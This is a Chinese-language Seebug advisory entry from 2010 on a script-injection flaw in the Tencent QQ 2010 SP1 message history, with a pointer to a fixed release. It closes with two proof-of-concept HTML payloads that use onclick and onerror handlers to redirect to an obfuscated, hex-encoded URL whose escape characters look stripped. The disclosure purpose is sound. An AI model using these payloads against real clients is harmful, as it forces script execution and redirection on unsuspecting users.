腾讯QQ 2010 SP1消息记录远程代码注入漏洞

2010-10-26T00:00:00
ID SSV:20194
Type seebug
Reporter Root
Modified 2010-10-26T00:00:00

Description

腾讯QQ是一款在中国非常广泛使用的即时聊天工具。 腾讯QQ 2010 SP1在处理消息记录时,没有对会话消息中的Javascript和Html标签进行正确转义,攻击者可以发送恶意消息注入脚本代码并执行。

Tencent QQ 2010 SP1 最新版本的腾讯QQ已经修复此漏洞,建议用户下载使用: http://im.qq.com/qq/dlqq.shtml

                                        
                                            
                                                <input onclick="window.location=' x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>    
<img src='tetet' onerror="window.location='x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>